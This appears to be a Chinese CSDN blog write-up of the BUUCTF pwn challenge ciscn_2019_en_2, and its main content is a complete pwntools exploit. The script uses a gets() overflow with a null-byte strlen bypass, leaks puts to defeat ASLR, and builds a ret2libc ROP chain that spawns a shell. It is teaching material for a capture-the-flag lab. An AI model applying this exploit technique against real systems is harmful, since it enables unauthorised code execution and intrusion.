ciscn_2019_en_2

最新推荐文章于 2023-04-11 09:16:10 发布
最新推荐文章于 2023-04-11 09:16:10 发布
阅读量157 收藏
点赞数
分类专栏: buuctf ctf 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/125440608
版权

缓冲区溢出 ROP libc泄露 system函数 exploit
关键词由CSDN通过智能技术生成
笔记 同时被 3 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏
buuctf
39 篇文章 0 订阅
订阅专栏

ciscn_2019_en_2

题目地址 : https://buuoj.cn/challenges#ciscn_2019_en_2
在这里插入图片描述

main函数

主要是进行表单选项展示和选择,根据123来进行选项操作,关键的是encrypt函数

在这里插入图片描述

encrypt函数

这个函数是关键利用点
gets无限溢出,strlen对长度进行检查,但是可以被\x00绕过,然后这个函数是对输入的字符进行异或这并没有什么影响

在这里插入图片描述

但是程序中并无后门函数,这就需要我们泄漏libc中的system函数的地址和\bin\sh的地址来构造rop

exp

from pwn import *
from LibcSearcher import LibcSearcher
io = process('./ciscn_2019_en_2')
io = remote("node4.buuoj.cn",29425)
elf = ELF('./ciscn_2019_en_2')
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
_start_addr = elf.symbols['_start']
pop_rdi = 0x0000000000400c83
ret = 0x00000000004006b9
payload = b'\x00'+b'a'*87+p64(pop_rdi)+p64(puts_got_addr)+p64(puts_plt_addr)+p64(_start_addr)
 
io.sendlineafter('Input your choice!\n','1')
 
io.sendlineafter('Input your Plaintext to be encrypted\n',payload)
io.recvline()
io.recvline()
#puts_addr=u64(io.recv()[0:8])
puts_addr=u64(io.recvuntil('\n')[:-1].ljust(8,b'\0'))
print hex(puts_addr)
#libc = LibcSearcher('puts',puts_addr)
#libcbase = puts_addr - libc.dump('puts')
#print libcbase
#system_addr = libcbase + libc.dump('system')
#binsh_addr = libcbase + libc.dump('str_bin_sh')
libc = ELF("libc-2.27.so")

offset = puts_addr - libc.symbols["puts"]
system_addr = libc.symbols["system"] + offset
binsh_addr = next(libc.search("/bin/sh")) + offset
payload = b'\x00'+b'a'*87 + p64(pop_rdi) + p64(binsh_addr)+p64(ret)+p64(system_addr)+p64(0)
io.sendline('1')
io.recv()
io.sendline(payload)
io.interactive()
[mzq]
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
scada_5.8.3_full_en
08-02
scada_5.8.3_full_en
N140HCE_EN2校色文件
04-02
7500k色温红蜘蛛校色
[BUUCTF-pwn]——ciscn_2019_en_2
Y_peak的博客
02-10 813
[BUUCTF-pwn]——ciscn_2019_en_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_en_2 题目: 这是一道和之前一摸一样的题,请点击
BUUCTF ciscn_2019_en_2
carol2358的博客
04-09 2255
这题整体的思路是ret2libc 先checksec 理一下题目: 只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_l...
【BUUCTF - PWN】ciscn_2019_en_2
古月浪子的博客
03-25 1184
不知道是不是题目重复了,反正我的另一篇博文的exp可以直接copy过来打通… 传送门:【BUUCTF - PWN】ciscn_2019_c_1 附件:ciscn_2019_en_2
[BUUCTF]PWN9——ciscn_2019_en_2
mcmuyanga的博客
08-26 570
[BUUCTF]PWN9——ciscn_2019_en_2 题目网址:https://buuoj.cn/challenges#ciscn_2019_en_2 步骤: 例行检查,64位,开启了NX保护 nc一下看看程序的执行大概流程,看这个模样很眼熟 ida查看了一下程序,确定了跟之前的 [BUUCTF]PWN6——ciscn_2019_c_1 一样,具体的看那题的链接 exp: from pwn import* from LibcSearcher import* r=remote('node3.buu
simocode_en
03-16
simocode_en.pdf 介绍了关于simocode_en的详细说明,提供运动控制的技术资料的下载。
【CTF】ciscn_2019_en_2
凉水的博客
01-26 3765
解题思路: 1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分): void encrypt(char *__block,int __edflag) { size_t sVar1; long lVar2; ulong uVar3; undefined8 *puVar4; undefined8 local_58 [9]; ... *(undefined2 *)puVar4 = 0; puts("Input your Plaintext to be encr
BUUCTF-PWN-ciscn_2019_en_2
Henlenl的博客
05-19 252
文章目录查看文件信息IDA 分析exp 查看文件信息 amd 64位系统 NX保护 IDA 分析 nc 程序连接一下 没什么东西 给了几个选择的按钮 IDA 64分析一波 发现其实程序就只能选择1 而且关键函数是encrypt 我们进去看一下 所以 只要让 var[13] = 17就行了 exp 但是 这里要说明一下 32位程序是能直接去内存中寻址执行的 64位就是要依靠寄存器来寻址 然后找到地址返回给程序去执行的 ...
BUUCTF pwn——ciscn_2019_en_2
CNS-Enterprise BCC-1701-J
04-05 133
BUUCTF 做题练习
[CTF]BUUCTF-PWN-ciscn_2019_en_2
最新发布
weixin_53394081的博客
04-11 268
【CTF】BUUCTF-ciscn_2019_en_2 pwn
SAP PA LO315_EN_46A_FV过程管理系统培训手册
2. Process Management:文件的标题和内容都提到了 Process Management,Process Management 是指企业中对业务流程的管理和优化,旨在提高企业的效率和效益。 3. 版本控制:文件中提到了 Release 4.6,表明该文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值